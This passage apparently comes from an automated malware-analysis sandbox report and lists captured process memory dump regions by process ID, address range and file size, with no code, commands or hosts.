                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/2640-54-0x0000014DA5870000-0x0000014DA5871000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/2640-57-0x0000014DA5870000-0x0000014DA5871000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/2640-50-0x0000014DA5870000-0x0000014DA5871000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/2640-58-0x0000014DA5870000-0x0000014DA5871000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/2640-59-0x0000014DA5870000-0x0000014DA5871000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/2640-60-0x0000014DA5870000-0x0000014DA5871000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/2644-602-0x0000000000400000-0x0000000000473000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                460KB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/2960-152-0x0000000000400000-0x0000000000414000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                80KB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/3020-120-0x000000001C410000-0x000000001C8DE000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                4.8MB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/3020-125-0x000000001C980000-0x000000001CA1C000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                624KB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/3632-212-0x0000000001120000-0x0000000001128000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                32KB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/3968-124-0x0000000004F20000-0x0000000004F68000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                288KB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/3968-109-0x0000000000660000-0x00000000006D4000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                464KB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/3968-127-0x0000000004F70000-0x0000000004FB0000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                256KB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/3968-130-0x0000000005560000-0x0000000005B04000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                5.6MB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/4552-24941-0x0000000000900000-0x000000000090C000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                48KB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/4552-11806-0x0000000005A90000-0x0000000005A9C000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                48KB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/4552-374-0x00000000051E0000-0x00000000053A2000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                1.8MB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/4552-372-0x0000000002850000-0x0000000002878000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                160KB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/4552-5088-0x0000000005A20000-0x0000000005A42000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                136KB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/4552-5089-0x00000000051C0000-0x00000000051C8000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                32KB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/4552-373-0x0000000004EE0000-0x0000000004F46000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                408KB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/4552-110-0x0000000000420000-0x00000000004C2000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                648KB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/4876-55167-0x0000000000400000-0x000000000044C000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                304KB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/4972-16789-0x0000000005510000-0x000000000551C000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                48KB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/4972-375-0x0000000004AA0000-0x0000000004ACA000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                168KB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/4972-10042-0x00000000054D0000-0x00000000054D8000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                32KB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/4972-111-0x0000000000100000-0x0000000000198000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                608KB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/5884-23898-0x0000000000400000-0x0000000000608000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                2.0MB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/5884-20157-0x0000000000400000-0x0000000000608000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                2.0MB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/6508-27524-0x0000000000ED0000-0x0000000000EFC000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                176KB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/6508-27522-0x0000000000ED0000-0x0000000000EFC000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                176KB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/6932-12765-0x0000000000400000-0x0000000000608000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                2.0MB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/6932-7185-0x0000000000400000-0x0000000000608000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                2.0MB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/7352-27526-0x0000000000ED0000-0x0000000000EFC000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                176KB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/8168-1617-0x0000000000400000-0x000000000045A000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                360KB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/8168-20849-0x0000000007120000-0x0000000007170000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                320KB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/8168-21032-0x00000000070F0000-0x00000000070FA000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                40KB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/8168-20206-0x00000000060B0000-0x00000000060BA000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                40KB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/8168-3197-0x0000000005AF0000-0x0000000005B8C000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                624KB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/8168-2135-0x00000000058C0000-0x0000000005952000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                584KB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/8168-7186-0x0000000006020000-0x0000000006038000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                96KB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/11684-26614-0x0000000000BC0000-0x0000000000D00000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                1.2MB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/11684-38922-0x0000000000BC0000-0x0000000000D00000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                1.2MB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/11684-25334-0x0000000000BC0000-0x0000000000D00000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                1.2MB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/12252-27528-0x0000000000ED0000-0x0000000000EFC000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                176KB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/12776-53487-0x0000000005540000-0x000000000554C000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                48KB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/12812-39432-0x0000000000BC0000-0x0000000000D00000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                1.2MB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/12812-20156-0x0000000000BC0000-0x0000000000D00000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                1.2MB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/12812-25026-0x0000000000BC0000-0x0000000000D00000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                1.2MB